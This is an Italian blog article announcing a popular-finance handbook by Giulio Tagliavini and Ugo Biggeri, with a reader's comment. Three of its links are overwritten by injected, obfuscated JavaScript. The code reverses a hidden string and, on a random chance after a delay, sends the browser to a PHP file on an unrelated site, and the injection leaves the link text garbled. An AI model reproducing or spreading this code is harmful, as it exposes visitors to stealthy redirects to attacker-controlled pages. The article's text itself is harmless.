Capirci qualcosa: ecco il Manuale di finanza popolare, anche in e-book

image_pdfimage_print

Sara Capolungo per l’Altracittà

La finanza non ammette ignoranza. Dopo le tangibili e nefaste conseguenze dello spread, che tutti abbiamo imparato a conoscere, si è capito che la finanza, e la gestione dei risparmi, riguarda proprio tutti: dalle famiglie ai singoli, dai ricchi ai redditi minimi, nessuno può dirsi indifferente all’argomento.

È questo il motivo che ha spinto Giulio Tagliavini (di Finanza Solidale e già professore universitario) e Ugo Biggeri (presidente di Banca Etica) a scrivere un “$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and-ugo-biggeri/manuale-di-finanza-popolare/ebook/product-20421936.html” target=”_blank”>Manuale di finanza popolare”, un libro per “spiegare le questioni finanziarie – precisa Biggeri – che riguardano le persone comuni. È un manuale per chi non conosce la finanza e per provare a chiarire le scelte che spesso inconsapevolmente facciamo, ed è quindi un tentativo di spiegare, dare informazioni di base, e riportare un po’ di buon senso nelle scelte finanziarie di ognuno di noi”.

Il volume analizza i problemi concreti dell’investimento del risparmio, oltre ad affrontare il tema dell’integrazione delle scelte finanziarie a supporto degli obiettivi della famiglia, prendendo come punto di riferimento il piccolo investitore e offrendo una serie di consigli metodologici su come affrontare la gestione dei propri investimenti. “Un buon livello di conoscenza delle regole base della finanza – spiegano gli autori – può concorrere concretamente al principio costituzionale di difesa del risparmio”.

Oltre agli scritti dei due curatori, il libro raccoglie i contributi di Luigi Bellavita, Alberto Fantuzzo, Federica Ielasi, Lucia Poletti, Paolo Righini e Maurizio Spedaletti.

Il costo del volume è di 15 euro, per il $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and-ugo-biggeri/manuale-di-finanza-popolare/paperback/product-20421955.html” target=”_blank”>formato cartaceo, ma è anche possibile scaricarlo gratuitamente come $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and-ugo-biggeri/manuale-di-finanza-popolare/ebook/product-20421936.html.” target=”_blank”>e-book.

0 Comments

  1. Carlo

    Consiglio anche la lettura di “Il bilancio familiare” di Altamore del 2008. E’ un volume scritto dagli esperti del Sole24ore per lettori “non addetti ai lavori”. L’ho letto e mi è piaciuto molto.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *